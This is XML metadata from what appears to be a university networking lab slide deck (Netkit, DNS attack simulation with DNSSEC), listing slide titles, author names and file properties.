      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>start the lab</vt:lpstr>
      <vt:lpstr>attack simulation with dnssec</vt:lpstr>
      <vt:lpstr>iptables command</vt:lpstr>
      <vt:lpstr>run Python script</vt:lpstr>
      <vt:lpstr>sniff the traffic</vt:lpstr>
      <vt:lpstr>firefox</vt:lpstr>
      <vt:lpstr>firefox</vt:lpstr>
      <vt:lpstr>wireshark</vt:lpstr>
      <vt:lpstr>wireshark</vt:lpstr>
      <vt:lpstr>trust-anchors view</vt:lpstr>
      <vt:lpstr>view hacker database</vt:lpstr>
      <vt:lpstr>view hacker database</vt:lpstr>
      <vt:lpstr>lab configuration with dnssec and redundancy</vt:lpstr>
      <vt:lpstr>content of the lab with dnssec and redundancy</vt:lpstr>
      <vt:lpstr>network topology</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>a quick look at the lab</vt:lpstr>
      <vt:lpstr>start the lab</vt:lpstr>
      <vt:lpstr>attack simulation with dnssec and redundancy</vt:lpstr>
      <vt:lpstr>iptables command</vt:lpstr>
      <vt:lpstr>run Python script</vt:lpstr>
      <vt:lpstr>firefox</vt:lpstr>
      <vt:lpstr>firefox</vt:lpstr>
      <vt:lpstr>firefox</vt:lpstr>
      <vt:lpstr>wireshark</vt:lpstr>
      <vt:lpstr>wireshark</vt:lpstr>
      <vt:lpstr>trust-anchors view</vt:lpstr>
      <vt:lpstr>view hacker database</vt:lpstr>
      <vt:lpstr>view hacker database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Netkit lab - arp</dc:title>
  <dc:subject>Address Resolution Protocol for local and non local traffic</dc:subject>
  <dc:creator>G. Di Battista, M. Patrignani, M. Pizzonia, F. Ricci, M. Rimondini</dc:creator>
  <cp:keywords>Netkit, ARP</cp:keywords>
  <cp:lastModifiedBy>DANIELE VILLA</cp:lastModifiedBy>
  <cp:revision>74</cp:revision>
  <cp:lastPrinted>2001-12-19T21:14:42Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2000-11-11T21:58:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-19T16:56:43Z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emplateType">
    <vt:i4>1</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="GraphicType">
    <vt:i4>2</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="Compression">
    <vt:i4>80</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="ScreenSize">
    <vt:i4>2</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="ScreenUsage">
    <vt:i4>1</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MailAddress">
    <vt:lpwstr>patrigna@dia.uniroma3.it</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="HomePage">
    <vt:lpwstr>http://www.dia.uniroma3.it/~patrigna</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="Other">
    <vt:lpwstr/>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="DownloadOriginal">
    <vt:bool>true</vt:bool>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="DownloadIEButton">
    <vt:bool>false</vt:bool>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="UseBrowserColor">
    <vt:bool>true</vt:bool>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="13" name="BackColor">
    <vt:i4>15132390</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="14" name="TextColor">
    <vt:i4>0</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="15" name="LinkColor">
    <vt:i4>16711782</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="16" name="VisitedColor">
    <vt:i4>10040268</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="17" name="TransparentButton">
    <vt:i4>0</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="18" name="ButtonType">
    <vt:i4>3</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="19" name="ShowNotes">
    <vt:bool>false</vt:bool>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="20" name="NavBtnPos">
    <vt:i4>1</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="21" name="OutputDir">
    <vt:lpwstr>C:\titto\teaching\ie</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="22" name="ContentTypeId">
    <vt:lpwstr>0x0101007EB2CA632F902743835D1E561AFB238F</vt:lpwstr>
  </property>
</Properties>
</file>